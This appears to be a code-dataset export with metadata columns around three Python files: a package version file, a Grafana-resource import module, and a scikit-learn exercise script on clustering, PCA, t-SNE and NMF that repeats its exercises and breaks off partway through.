| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d13d85363e00a6de80add3362faf5716d2678226
| 42
|
py
|
Python
|
hvad/__init__.py
|
Kunpors/dr.pors-
|
e1b9727c96add31af9c2a1a4b27a058b506748a6
|
[
"BSD-3-Clause"
] | null | null | null |
hvad/__init__.py
|
Kunpors/dr.pors-
|
e1b9727c96add31af9c2a1a4b27a058b506748a6
|
[
"BSD-3-Clause"
] | null | null | null |
hvad/__init__.py
|
Kunpors/dr.pors-
|
e1b9727c96add31af9c2a1a4b27a058b506748a6
|
[
"BSD-3-Clause"
] | 2
|
2017-12-28T02:34:41.000Z
|
2018-05-07T14:39:50.000Z
|
# Package version, exposed both as a tuple (for comparisons) and a string.
VERSION = (2, 0, 0)
__version__ = '.'.join(str(part) for part in VERSION)
| 14
| 21
| 0.571429
| 8
| 42
| 2.5
| 0.375
| 0.8
| 0.9
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176471
| 0.190476
| 42
| 2
| 22
| 21
| 0.411765
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1524c9e39032d1d219384acc425892a5e04d30b
| 173
|
py
|
Python
|
nixops_grafana/resources/__init__.py
|
adisbladis/nixops-grafana
|
6a3c2eced8322837d36615f3a6d9d4c71148826f
|
[
"MIT"
] | 3
|
2020-05-24T15:15:25.000Z
|
2021-10-05T21:19:50.000Z
|
nixops_grafana/resources/__init__.py
|
adisbladis/nixops-grafana
|
6a3c2eced8322837d36615f3a6d9d4c71148826f
|
[
"MIT"
] | 2
|
2020-05-22T00:28:04.000Z
|
2020-05-23T01:18:48.000Z
|
nixops_grafana/resources/__init__.py
|
adisbladis/nixops-grafana
|
6a3c2eced8322837d36615f3a6d9d4c71148826f
|
[
"MIT"
] | 1
|
2020-05-22T23:57:35.000Z
|
2020-05-22T23:57:35.000Z
|
from . import grafana_dashboard
from . import grafana_data_source
from . import grafana_folder
from . import grafana_notification_channel
from . import grafana_organization
| 28.833333
| 42
| 0.855491
| 22
| 173
| 6.409091
| 0.454545
| 0.35461
| 0.602837
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115607
| 173
| 5
| 43
| 34.6
| 0.921569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d16ea216084b1d5fceca13f953b79b92f678f202
| 45,103
|
py
|
Python
|
PythonExercises/ML/002_Unsupervised_Learning_scikit-learn.py
|
jorgeo80/UP_MDC
|
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
|
[
"MIT"
] | null | null | null |
PythonExercises/ML/002_Unsupervised_Learning_scikit-learn.py
|
jorgeo80/UP_MDC
|
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
|
[
"MIT"
] | null | null | null |
PythonExercises/ML/002_Unsupervised_Learning_scikit-learn.py
|
jorgeo80/UP_MDC
|
1b1c484b2fcd1d0eefdce3df3a9df0ae2179a95b
|
[
"MIT"
] | null | null | null |
# ============================================================================== #
# == Unsupervised Learning with scikit-learn == #
# ============================================================================== #
# ===================== #
# ==== Ejercicio 1 ==== #
# ===================== #
# Import KMeans
from sklearn.cluster import KMeans
# Create a KMeans instance with 3 clusters: model
model = KMeans(n_clusters = 3)
# Fit model to points
model.fit(points)
# Determine the cluster labels of new_points: labels
labels = model.predict(new_points)
# Print cluster labels of new_points
print(labels)
# ===================== #
# ==== Ejercicio 2 ==== #
# ===================== #
# Import pyplot
import matplotlib.pyplot as plt
# Assign the columns of new_points: xs and ys
xs = new_points[:, 0]
ys = new_points[:, 1]
# Make a scatter plot of xs and ys, using labels to define the colors
plt.scatter(xs, ys, c = labels, alpha = 0.5)
# Assign the cluster centers: centroids
centroids = model.cluster_centers_
# Assign the columns of centroids: centroids_x, centroids_y
centroids_x = centroids[:,0]
centroids_y = centroids[:,1]
# Make a scatter plot of centroids_x and centroids_y
plt.scatter(centroids_x, centroids_y, marker = 'D', s = 50)
plt.show()
# ===================== #
# ==== Ejercicio 3 ==== #
# ===================== #
ks = range(1, 6)
inertias = []
for k in ks:
# Create a KMeans instance with k clusters: model
model = KMeans(n_clusters = k)
# Fit model to samples
model.fit(samples)
# Append the inertia to the list of inertias
inertias.append(model.inertia_)
# Plot ks vs inertias
plt.plot(ks, inertias, '-o')
plt.xlabel('number of clusters, k')
plt.ylabel('inertia')
plt.xticks(ks)
plt.show()
# ===================== #
# ==== Ejercicio 4 ==== #
# ===================== #
# Create a KMeans model with 3 clusters: model
model = KMeans(n_clusters = 3)
# Use fit_predict to fit model and obtain cluster labels: labels
labels = model.fit_predict(samples)
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 5 ==== #
# ===================== #
# Perform the necessary imports
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
# Create scaler: scaler
scaler = StandardScaler()
# Create KMeans instance: kmeans
kmeans = KMeans(n_clusters = 4)
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, kmeans)
# ===================== #
# ==== Ejercicio 6 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to samples
pipeline.fit(samples)
# Calculate the cluster labels: labels
labels = pipeline.predict(samples)
# Create a DataFrame with labels and species as columns: df
df = pd.DataFrame({'labels': labels, 'species': species})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['species'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 7 ==== #
# ===================== #
# Import Normalizer
from sklearn.preprocessing import Normalizer
# Create a normalizer: normalizer
normalizer = Normalizer()
# Create a KMeans model with 10 clusters: kmeans
kmeans = KMeans(n_clusters = 10)
# Make a pipeline chaining normalizer and kmeans: pipeline
pipeline = make_pipeline(normalizer, kmeans)
# Fit pipeline to the daily price movements
pipeline.fit(movements)
# ===================== #
# ==== Ejercicio 8 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Predict the cluster labels: labels
labels = pipeline.predict(movements)
# Create a DataFrame aligning labels and companies: df
df = pd.DataFrame({'labels': labels, 'companies': companies})
# Display df sorted by cluster label
print(df.sort_values('labels'))
# ===================== #
# ==== Ejercicio 9 ==== #
# ===================== #
# Perform the necessary imports
from scipy.cluster.hierarchy import linkage, dendrogram
import matplotlib.pyplot as plt
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'complete')
# Plot the dendrogram, using varieties as labels
dendrogram(mergings,
labels = varieties,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 10 === #
# ===================== #
# Import normalize
from sklearn.preprocessing import normalize
# Normalize the movements: normalized_movements
normalized_movements = normalize(movements)
# Calculate the linkage: mergings
mergings = linkage(normalized_movements, method = 'complete')
# Plot the dendrogram
dendrogram(mergings,
labels = companies,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 11 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.cluster.hierarchy import linkage, dendrogram
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'single')
# Plot the dendrogram
dendrogram(mergings, labels = country_names, leaf_rotation = 90, leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 12 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from scipy.cluster.hierarchy import fcluster
# Use fcluster to extract labels: labels
labels = fcluster(mergings, 6, criterion = 'distance')
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 13 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 200)
# Apply fit_transform to samples: tsne_features
tsne_features = model.fit_transform(samples)
# Select the 0th feature: xs
xs = tsne_features[:,0]
# Select the 1st feature: ys
ys = tsne_features[:,1]
# Scatter plot, coloring by variety_numbers
plt.scatter(xs, ys, c = variety_numbers)
plt.show()
# ===================== #
# ==== Ejercicio 14 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 50)
# Apply fit_transform to normalized_movements: tsne_features
tsne_features = model.fit_transform(normalized_movements)
# Select the 0th feature: xs
xs = tsne_features[:, 0]
# Select the 1th feature: ys
ys = tsne_features[:, 1]
# Scatter plot
plt.scatter(xs, ys, alpha = 0.5)
# Annotate the points
for x, y, company in zip(xs, ys, companies):
plt.annotate(company, (x, y), fontsize=5, alpha=0.75)
plt.show()
# ===================== #
# ==== Ejercicio 15 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.stats import pearsonr
# Assign the 0th column of grains: width
width = grains[:, 0]
# Assign the 1st column of grains: length
length = grains[:, 1]
# Scatter plot width vs length
plt.scatter(width, length)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation
correlation, pvalue = pearsonr(width, length)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 16 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create PCA instance: model
model = PCA()
# Apply the fit_transform method of model to grains: pca_features
pca_features = model.fit_transform(grains)
# Assign 0th column of pca_features: xs
xs = pca_features[:,0]
# Assign 1st column of pca_features: ys
ys = pca_features[:,1]
# Scatter plot xs vs ys
plt.scatter(xs, ys)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation of xs and ys
correlation, pvalue = pearsonr(xs, ys)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 17 === #
# ===================== #
# Make a scatter plot of the untransformed points
plt.scatter(grains[:,0], grains[:,1])
# Create a PCA instance: model
model = PCA()
# Fit model to points
model.fit(grains)
# Get the mean of the grain samples: mean
mean = model.mean_
# Get the first principal component: first_pc
first_pc = model.components_[0, :]
# Plot first_pc as an arrow, starting at mean
plt.arrow(mean[0], mean[1], first_pc[0], first_pc[1], color = 'red', width = 0.01)
# Keep axes on same scale
plt.axis('equal')
plt.show()
# ===================== #
# ==== Ejercicio 18 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline
import matplotlib.pyplot as plt
# Create scaler: scaler
scaler = StandardScaler()
# Create a PCA instance: pca
pca = PCA()
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, pca)
# Fit the pipeline to 'samples'
pipeline.fit(samples)
# Plot the explained variances
features = range(pca.n_components_)
plt.bar(features, pca.explained_variance_)
plt.xlabel('PCA feature')
plt.ylabel('variance')
plt.xticks(features)
plt.show()
# ===================== #
# ==== Ejercicio 19 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA model with 2 components: pca
pca = PCA(n_components = 2)
# Fit the PCA instance to the scaled samples
pca.fit(scaled_samples)
# Transform the scaled samples: pca_features
pca_features = pca.transform(scaled_samples)
# Print the shape of pca_features
print(pca_features.shape)
# ===================== #
# ==== Ejercicio 20 === #
# ===================== #
# Import TfidfVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
# Create a TfidfVectorizer: tfidf
tfidf = TfidfVectorizer()
# Apply fit_transform to document: csr_mat
csr_mat = tfidf.fit_transform(documents)
# Print result of toarray() method
print(csr_mat.toarray())
# Get the words: words
words = tfidf.get_feature_names()
# Print words
print(words)
# ===================== #
# ==== Ejercicio 21 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import TruncatedSVD
from sklearn.cluster import KMeans
from sklearn.pipeline import make_pipeline
# Create a TruncatedSVD instance: svd
svd = TruncatedSVD(n_components = 50)
# Create a KMeans instance: kmeans
kmeans = KMeans(n_clusters = 6)
# Create a pipeline: pipeline
pipeline = make_pipeline(svd, kmeans)
# ============================================================================== #
# == Unsupervised Learning with scikit-learn == #
# ============================================================================== #
# ===================== #
# ==== Ejercicio 1 ==== #
# ===================== #
# Import KMeans
from sklearn.cluster import KMeans
# Create a KMeans instance with 3 clusters: model
model = KMeans(n_clusters = 3)
# Fit model to points
model.fit(points)
# Determine the cluster labels of new_points: labels
labels = model.predict(new_points)
# Print cluster labels of new_points
print(labels)
# ===================== #
# ==== Ejercicio 2 ==== #
# ===================== #
# Import pyplot
import matplotlib.pyplot as plt
# Assign the columns of new_points: xs and ys
xs = new_points[:, 0]
ys = new_points[:, 1]
# Make a scatter plot of xs and ys, using labels to define the colors
plt.scatter(xs, ys, c = labels, alpha = 0.5)
# Assign the cluster centers: centroids
centroids = model.cluster_centers_
# Assign the columns of centroids: centroids_x, centroids_y
centroids_x = centroids[:,0]
centroids_y = centroids[:,1]
# Make a scatter plot of centroids_x and centroids_y
plt.scatter(centroids_x, centroids_y, marker = 'D', s = 50)
plt.show()
# ===================== #
# ==== Ejercicio 3 ==== #
# ===================== #
ks = range(1, 6)
inertias = []
for k in ks:
# Create a KMeans instance with k clusters: model
model = KMeans(n_clusters = k)
# Fit model to samples
model.fit(samples)
# Append the inertia to the list of inertias
inertias.append(model.inertia_)
# Plot ks vs inertias
plt.plot(ks, inertias, '-o')
plt.xlabel('number of clusters, k')
plt.ylabel('inertia')
plt.xticks(ks)
plt.show()
# ===================== #
# ==== Ejercicio 4 ==== #
# ===================== #
# Create a KMeans model with 3 clusters: model
model = KMeans(n_clusters = 3)
# Use fit_predict to fit model and obtain cluster labels: labels
labels = model.fit_predict(samples)
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 5 ==== #
# ===================== #
# Perform the necessary imports
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
# Create scaler: scaler
scaler = StandardScaler()
# Create KMeans instance: kmeans
kmeans = KMeans(n_clusters = 4)
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, kmeans)
# ===================== #
# ==== Ejercicio 6 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to samples
pipeline.fit(samples)
# Calculate the cluster labels: labels
labels = pipeline.predict(samples)
# Create a DataFrame with labels and species as columns: df
df = pd.DataFrame({'labels': labels, 'species': species})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['species'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 7 ==== #
# ===================== #
# Import Normalizer
from sklearn.preprocessing import Normalizer
# Create a normalizer: normalizer
normalizer = Normalizer()
# Create a KMeans model with 10 clusters: kmeans
kmeans = KMeans(n_clusters = 10)
# Make a pipeline chaining normalizer and kmeans: pipeline
pipeline = make_pipeline(normalizer, kmeans)
# Fit pipeline to the daily price movements
pipeline.fit(movements)
# ===================== #
# ==== Ejercicio 8 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Predict the cluster labels: labels
labels = pipeline.predict(movements)
# Create a DataFrame aligning labels and companies: df
df = pd.DataFrame({'labels': labels, 'companies': companies})
# Display df sorted by cluster label
print(df.sort_values('labels'))
# ===================== #
# ==== Ejercicio 9 ==== #
# ===================== #
# Perform the necessary imports
from scipy.cluster.hierarchy import linkage, dendrogram
import matplotlib.pyplot as plt
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'complete')
# Plot the dendrogram, using varieties as labels
dendrogram(mergings,
labels = varieties,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 10 === #
# ===================== #
# Import normalize
from sklearn.preprocessing import normalize
# Normalize the movements: normalized_movements
normalized_movements = normalize(movements)
# Calculate the linkage: mergings
mergings = linkage(normalized_movements, method = 'complete')
# Plot the dendrogram
dendrogram(mergings,
labels = companies,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 11 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.cluster.hierarchy import linkage, dendrogram
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'single')
# Plot the dendrogram
dendrogram(mergings, labels = country_names, leaf_rotation = 90, leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 12 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from scipy.cluster.hierarchy import fcluster
# Use fcluster to extract labels: labels
labels = fcluster(mergings, 6, criterion = 'distance')
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 13 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 200)
# Apply fit_transform to samples: tsne_features
tsne_features = model.fit_transform(samples)
# Select the 0th feature: xs
xs = tsne_features[:,0]
# Select the 1st feature: ys
ys = tsne_features[:,1]
# Scatter plot, coloring by variety_numbers
plt.scatter(xs, ys, c = variety_numbers)
plt.show()
# ===================== #
# ==== Ejercicio 14 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 50)
# Apply fit_transform to normalized_movements: tsne_features
tsne_features = model.fit_transform(normalized_movements)
# Select the 0th feature: xs
xs = tsne_features[:, 0]
# Select the 1th feature: ys
ys = tsne_features[:, 1]
# Scatter plot
plt.scatter(xs, ys, alpha = 0.5)
# Annotate the points
for x, y, company in zip(xs, ys, companies):
plt.annotate(company, (x, y), fontsize=5, alpha=0.75)
plt.show()
# ===================== #
# ==== Ejercicio 15 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.stats import pearsonr
# Assign the 0th column of grains: width
width = grains[:, 0]
# Assign the 1st column of grains: length
length = grains[:, 1]
# Scatter plot width vs length
plt.scatter(width, length)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation
correlation, pvalue = pearsonr(width, length)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 16 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create PCA instance: model
model = PCA()
# Apply the fit_transform method of model to grains: pca_features
pca_features = model.fit_transform(grains)
# Assign 0th column of pca_features: xs
xs = pca_features[:,0]
# Assign 1st column of pca_features: ys
ys = pca_features[:,1]
# Scatter plot xs vs ys
plt.scatter(xs, ys)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation of xs and ys
correlation, pvalue = pearsonr(xs, ys)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 17 === #
# ===================== #
# Make a scatter plot of the untransformed points
plt.scatter(grains[:,0], grains[:,1])
# Create a PCA instance: model
model = PCA()
# Fit model to points
model.fit(grains)
# Get the mean of the grain samples: mean
mean = model.mean_
# Get the first principal component: first_pc
first_pc = model.components_[0, :]
# Plot first_pc as an arrow, starting at mean
plt.arrow(mean[0], mean[1], first_pc[0], first_pc[1], color = 'red', width = 0.01)
# Keep axes on same scale
plt.axis('equal')
plt.show()
# ===================== #
# ==== Ejercicio 18 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline
import matplotlib.pyplot as plt
# Create scaler: scaler
scaler = StandardScaler()
# Create a PCA instance: pca
pca = PCA()
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, pca)
# Fit the pipeline to 'samples'
pipeline.fit(samples)
# Plot the explained variances
features = range(pca.n_components_)
plt.bar(features, pca.explained_variance_)
plt.xlabel('PCA feature')
plt.ylabel('variance')
plt.xticks(features)
plt.show()
# ===================== #
# ==== Ejercicio 19 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA model with 2 components: pca
pca = PCA(n_components = 2)
# Fit the PCA instance to the scaled samples
pca.fit(scaled_samples)
# Transform the scaled samples: pca_features
pca_features = pca.transform(scaled_samples)
# Print the shape of pca_features
print(pca_features.shape)
# ===================== #
# ==== Ejercicio 20 === #
# ===================== #
# Import TfidfVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
# Create a TfidfVectorizer: tfidf
tfidf = TfidfVectorizer()
# Apply fit_transform to document: csr_mat
csr_mat = tfidf.fit_transform(documents)
# Print result of toarray() method
print(csr_mat.toarray())
# Get the words: words
words = tfidf.get_feature_names()
# Print words
print(words)
# ===================== #
# ==== Ejercicio 21 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import TruncatedSVD
from sklearn.cluster import KMeans
from sklearn.pipeline import make_pipeline
# Create a TruncatedSVD instance: svd
svd = TruncatedSVD(n_components = 50)
# Create a KMeans instance: kmeans
kmeans = KMeans(n_clusters = 6)
# Create a pipeline: pipeline
pipeline = make_pipeline(svd, kmeans)
# ===================== #
# ==== Ejercicio 22 === #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to articles
pipeline.fit(articles)
# Calculate the cluster labels: labels
labels = pipeline.predict(articles)
# Create a DataFrame aligning labels and titles: df
df = pd.DataFrame({'label': labels, 'article': titles})
# Display df sorted by cluster label
print(df.sort_values('label'))
# ===================== #
# ==== Ejercicio 23 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF instance: model
model = NMF(n_components = 6)
# Fit the model to articles
model.fit(articles)
# Transform the articles: nmf_features
nmf_features = model.transform(articles)
# Print the NMF features
print(nmf_features)
# ===================== #
# ==== Ejercicio 24 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a pandas DataFrame: df
df = pd.DataFrame(nmf_features, index = titles)
# Print the row for 'Anne Hathaway'
print(df.loc['Anne Hathaway'])
# Print the row for 'Denzel Washington'
print(df.loc['Denzel Washington'])
# ===================== #
# ==== Ejercicio 25 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: components_df
components_df = pd.DataFrame(model.components_, columns = words)
# Print the shape of the DataFrame
print(components_df.shape)
# Select row 3: component
component = components_df.iloc[3]
# Print result of nlargest
print(component.nlargest())
# ===================== #
# ==== Ejercicio 26 === #
# ===================== #
# Import pyplot
from matplotlib import pyplot as plt
# Select the 0th row: digit
digit = samples[0, :]
# Print digit
print(digit)
# Reshape digit to a 13x8 array: bitmap
bitmap = digit.reshape(13, 8)
# Print bitmap
print(bitmap)
# Use plt.imshow to display bitmap
plt.imshow(bitmap, cmap='gray', interpolation='nearest')
plt.colorbar()
plt.show()
# ===================== #
# ==== Ejercicio 27 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF model: model
model = NMF(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# Assign the 0th row of features: digit_features
digit_features = features[0, :]
# Print digit_features
print(digit_features)
# ===================== #
# ==== Ejercicio 28 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA instance: model
model = PCA(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# ===================== #
# ==== Ejercicio 29 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from sklearn.preprocessing import normalize
# Normalize the NMF features: norm_features
norm_features = normalize(nmf_features)
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = titles)
# Select the row corresponding to 'Cristiano Ronaldo': article
article = df.loc['Cristiano Ronaldo']
# Compute the dot products: similarities
similarities = df.dot(article)
# Display those with the largest cosine similarity
print(similarities.nlargest())
# ===================== #
# ==== Ejercicio 30 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import NMF
from sklearn.preprocessing import Normalizer, MaxAbsScaler
from sklearn.pipeline import make_pipeline
# Create a MaxAbsScaler: scaler
scaler = MaxAbsScaler()
# Create an NMF model: nmf
nmf = NMF(n_components = 20)
# Create a Normalizer: normalizer
normalizer = Normalizer()
# Create a pipeline: pipeline
pipeline = make_pipeline(scaler, nmf, normalizer)
# Apply fit_transform to artists: norm_features
norm_features = pipeline.fit_transform(artists)
# ===================== #
# ==== Ejercicio 31 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = artist_names)
# Select row of 'Bruce Springsteen': artist
artist = df.loc['Bruce Springsteen']
# Compute cosine similarities: similarities
similarities = df.dot(artist)
# Display those with highest cosine similarity
print(similarities.nlargest())# ============================================================================== #
# == Unsupervised Learning with scikit-learn == #
# ============================================================================== #
# ===================== #
# ==== Ejercicio 1 ==== #
# ===================== #
# Import KMeans
from sklearn.cluster import KMeans
# Create a KMeans instance with 3 clusters: model
model = KMeans(n_clusters = 3)
# Fit model to points
model.fit(points)
# Determine the cluster labels of new_points: labels
labels = model.predict(new_points)
# Print cluster labels of new_points
print(labels)
# ===================== #
# ==== Ejercicio 2 ==== #
# ===================== #
# Import pyplot
import matplotlib.pyplot as plt
# Assign the columns of new_points: xs and ys
xs = new_points[:, 0]
ys = new_points[:, 1]
# Make a scatter plot of xs and ys, using labels to define the colors
plt.scatter(xs, ys, c = labels, alpha = 0.5)
# Assign the cluster centers: centroids
centroids = model.cluster_centers_
# Assign the columns of centroids: centroids_x, centroids_y
centroids_x = centroids[:,0]
centroids_y = centroids[:,1]
# Make a scatter plot of centroids_x and centroids_y
plt.scatter(centroids_x, centroids_y, marker = 'D', s = 50)
plt.show()
# ===================== #
# ==== Ejercicio 3 ==== #
# ===================== #
ks = range(1, 6)
inertias = []
for k in ks:
# Create a KMeans instance with k clusters: model
model = KMeans(n_clusters = k)
# Fit model to samples
model.fit(samples)
# Append the inertia to the list of inertias
inertias.append(model.inertia_)
# Plot ks vs inertias
plt.plot(ks, inertias, '-o')
plt.xlabel('number of clusters, k')
plt.ylabel('inertia')
plt.xticks(ks)
plt.show()
# ===================== #
# ==== Ejercicio 4 ==== #
# ===================== #
# Create a KMeans model with 3 clusters: model
model = KMeans(n_clusters = 3)
# Use fit_predict to fit model and obtain cluster labels: labels
labels = model.fit_predict(samples)
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 5 ==== #
# ===================== #
# Perform the necessary imports
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
# Create scaler: scaler
scaler = StandardScaler()
# Create KMeans instance: kmeans
kmeans = KMeans(n_clusters = 4)
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, kmeans)
# ===================== #
# ==== Ejercicio 6 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to samples
pipeline.fit(samples)
# Calculate the cluster labels: labels
labels = pipeline.predict(samples)
# Create a DataFrame with labels and species as columns: df
df = pd.DataFrame({'labels': labels, 'species': species})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['species'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 7 ==== #
# ===================== #
# Import Normalizer
from sklearn.preprocessing import Normalizer
# Create a normalizer: normalizer
normalizer = Normalizer()
# Create a KMeans model with 10 clusters: kmeans
kmeans = KMeans(n_clusters = 10)
# Make a pipeline chaining normalizer and kmeans: pipeline
pipeline = make_pipeline(normalizer, kmeans)
# Fit pipeline to the daily price movements
pipeline.fit(movements)
# ===================== #
# ==== Ejercicio 8 ==== #
# ===================== #
# Import pandas
import pandas as pd
# Predict the cluster labels: labels
labels = pipeline.predict(movements)
# Create a DataFrame aligning labels and companies: df
df = pd.DataFrame({'labels': labels, 'companies': companies})
# Display df sorted by cluster label
print(df.sort_values('labels'))
# ===================== #
# ==== Ejercicio 9 ==== #
# ===================== #
# Perform the necessary imports
from scipy.cluster.hierarchy import linkage, dendrogram
import matplotlib.pyplot as plt
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'complete')
# Plot the dendrogram, using varieties as labels
dendrogram(mergings,
labels = varieties,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 10 === #
# ===================== #
# Import normalize
from sklearn.preprocessing import normalize
# Normalize the movements: normalized_movements
normalized_movements = normalize(movements)
# Calculate the linkage: mergings
mergings = linkage(normalized_movements, method = 'complete')
# Plot the dendrogram
dendrogram(mergings,
labels = companies,
leaf_rotation = 90,
leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 11 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.cluster.hierarchy import linkage, dendrogram
# Calculate the linkage: mergings
mergings = linkage(samples, method = 'single')
# Plot the dendrogram
